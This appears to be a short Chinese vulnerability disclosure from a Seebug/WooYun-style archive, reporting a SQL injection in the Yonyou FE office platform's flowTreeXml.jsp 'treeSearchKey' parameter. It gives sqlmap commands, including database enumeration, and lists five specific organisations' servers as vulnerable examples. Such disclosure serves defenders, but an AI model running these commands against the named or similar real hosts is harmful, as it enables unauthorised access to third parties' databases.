### 简要描述:
用友FE办公平台通用SQL注入
### 详细说明:
该连接存在SQL注入
/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1"
[<img src="https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/27112023517614365722160a22ef26e7a8ecd45a.jpg)
sqlmap -u "http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1" --dbs
[<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)
5个案例:
http://oa.hzuf.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://oa.shunhengli.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://oa.chnjcdc.com:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://115.29.234.197:8090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
http://119.145.194.122:9090/permissionsreport/flowTreeXml.jsp?treeSearchKey=1
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/272033328e22b92471889e0306c25a3447a243d8.jpg)
京公网安备 11010502034610号
暂无评论